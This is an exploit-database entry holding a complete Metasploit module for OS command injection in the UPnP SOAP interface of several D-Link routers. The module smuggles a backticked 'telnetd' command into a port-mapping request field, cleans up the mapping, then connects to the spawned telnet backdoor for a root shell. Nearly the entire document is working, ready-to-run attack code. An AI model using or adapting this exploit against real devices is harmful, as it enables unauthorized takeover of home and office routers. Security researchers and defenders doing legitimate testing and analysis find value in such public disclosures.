D-Link Devices UPnP SOAP Telnetd Command Execution

{"type": "zdt", "lastseen": "2016-04-19T01:31:10", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "D-Link Devices UPnP SOAP Telnetd Command Execution", "published": "2013-09-17T00:00:00", "href": "http://0day.today/exploit/description/21237", "cvss": {"vector": "NONE", "score": 0}, "description": "Various D-Link Routers are vulnerable to OS command injection in the UPnP SOAP interface. This Metasploit module has been tested successfully on DIR-300, DIR-600, DIR-645, DIR-845 and DIR-865. According to the vulnerability discoverer, more D-Link devices may be affected.", "hash": "24997de9d39c51584da49aa5369891d66d6f2dbaa67b04963b8fcadc36303529", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'D-Link Devices UPnP SOAP Telnetd Command Execution',\r\n 'Description' => %q{\r\n Various D-Link Routers are vulnerable to OS command injection in the UPnP SOAP\r\n interface. This module has been tested successfully on DIR-300, DIR-600, DIR-645,\r\n DIR-845 and DIR-865. According to the vulnerability discoverer, more D-Link devices\r\n may be affected.\r\n },\r\n 'Author' =>\r\n [\r\n 'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module\r\n 'juan vazquez' # minor help with msf module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'OSVDB', '94924' ],\r\n [ 'BID', '61005' ],\r\n [ 'EDB', '26664' ],\r\n [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-020' ]\r\n ],\r\n 'DisclosureDate' => 'Jul 05 2013',\r\n 'Privileged' => true,\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Payload' =>\r\n {\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd_interact',\r\n 'ConnectionType' => 'find',\r\n },\r\n },\r\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', { } ],\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(49152) #port of UPnP SOAP webinterface\r\n ], self.class)\r\n\r\n register_advanced_options(\r\n [\r\n OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),\r\n OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])\r\n ], self.class)\r\n end\r\n\r\n def tel_timeout\r\n (datastore['TelnetTimeout'] || 10).to_i\r\n end\r\n\r\n def banner_timeout\r\n (datastore['TelnetBannerTimeout'] || 25).to_i\r\n end\r\n\r\n def exploit\r\n @new_portmapping_descr = rand_text_alpha(8)\r\n @new_external_port = rand(65535)\r\n @new_internal_port = rand(65535)\r\n telnetport = rand(65535)\r\n\r\n vprint_status(\"#{rhost}:#{rport} - Telnetport: #{telnetport}\")\r\n\r\n cmd = \"telnetd -p #{telnetport}\"\r\n type = \"add\"\r\n res = request(cmd, type)\r\n if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\\,\\ UPnP\\/1.0,\\ DIR/)\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Unable to execute payload\")\r\n end\r\n type = \"delete\"\r\n res = request(cmd, type)\r\n if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\\,\\ UPnP\\/1.0,\\ DIR/)\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Unable to execute payload\")\r\n end\r\n\r\n print_status(\"#{rhost}:#{rport} - Trying to establish a telnet connection...\")\r\n sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })\r\n\r\n if sock.nil?\r\n fail_with(Exploit::Failure::Unreachable, \"#{rhost}:#{rport} - Backdoor service has not been spawned!!!\")\r\n end\r\n\r\n print_status(\"#{rhost}:#{rport} - Trying to establish a telnet session...\")\r\n prompt = negotiate_telnet(sock)\r\n if prompt.nil?\r\n sock.close\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Unable to establish a telnet session\")\r\n else\r\n print_good(\"#{rhost}:#{rport} - Telnet session successfully established...\")\r\n end\r\n\r\n handler(sock)\r\n end\r\n\r\n def request(cmd, type)\r\n\r\n uri = '/soap.cgi'\r\n\r\n data_cmd = \"<?xml version=\\\"1.0\\\"?>\"\r\n data_cmd << \"<SOAP-ENV:Envelope xmlns:SOAP-ENV=\\\"http://schemas.xmlsoap.org/soap/envelope\\\" SOAP-ENV:encodingStyle=\\\"http://schemas.xmlsoap.org/soap/encoding/\\\">\"\r\n data_cmd << \"<SOAP-ENV:Body>\"\r\n\r\n if type == \"add\"\r\n vprint_status(\"#{rhost}:#{rport} - adding portmapping\")\r\n\r\n soapaction = \"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\"\r\n\r\n data_cmd << \"<m:AddPortMapping xmlns:m=\\\"urn:schemas-upnp-org:service:WANIPConnection:1\\\">\"\r\n data_cmd << \"<NewPortMappingDescription>#{@new_portmapping_descr}</NewPortMappingDescription>\"\r\n data_cmd << \"<NewLeaseDuration></NewLeaseDuration>\"\r\n data_cmd << \"<NewInternalClient>`#{cmd}`</NewInternalClient>\"\r\n data_cmd << \"<NewEnabled>1</NewEnabled>\"\r\n data_cmd << \"<NewExternalPort>#{@new_external_port}</NewExternalPort>\"\r\n data_cmd << \"<NewRemoteHost></NewRemoteHost>\"\r\n data_cmd << \"<NewProtocol>TCP</NewProtocol>\"\r\n data_cmd << \"<NewInternalPort>#{@new_internal_port}</NewInternalPort>\"\r\n data_cmd << \"</m:AddPortMapping>\"\r\n else\r\n #we should clean it up ... otherwise we are not able to exploit it multiple times\r\n vprint_status(\"#{rhost}:#{rport} - deleting portmapping\")\r\n soapaction = \"urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping\"\r\n\r\n data_cmd << \"<m:DeletePortMapping xmlns:m=\\\"urn:schemas-upnp-org:service:WANIPConnection:1\\\">\"\r\n data_cmd << \"<NewProtocol>TCP</NewProtocol><NewExternalPort>#{@new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>\"\r\n data_cmd << \"</m:DeletePortMapping>\"\r\n end\r\n\r\n data_cmd << \"</SOAP-ENV:Body>\"\r\n data_cmd << \"</SOAP-ENV:Envelope>\"\r\n\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'vars_get' => {\r\n 'service' => 'WANIPConn1'\r\n },\r\n 'ctype' => \"text/xml\",\r\n 'method' => 'POST',\r\n 'headers' => {\r\n 'SOAPAction' => soapaction,\r\n },\r\n 'data' => data_cmd\r\n })\r\n return res\r\n rescue ::Rex::ConnectionError\r\n fail_with(Exploit::Failure::Unreachable, \"#{rhost}:#{rport} - Failed to connect to the web server\")\r\n end\r\n end\r\n\r\n def negotiate_telnet(sock)\r\n begin\r\n Timeout.timeout(banner_timeout) do\r\n while(true)\r\n data = sock.get_once(-1, tel_timeout)\r\n return nil if not data or data.length == 0\r\n if data =~ /\\x23\\x20$/\r\n return true\r\n end\r\n end\r\n end\r\n rescue ::Timeout::Error\r\n return nil\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2016-04-19] #", "id": "1337DAY-ID-21237", "sourceHref": "http://0day.today/exploit/21237", "modified": "2013-09-17T00:00:00", "reporter": "metasploit", "enchantments": {"vulnersScore": 4.1}}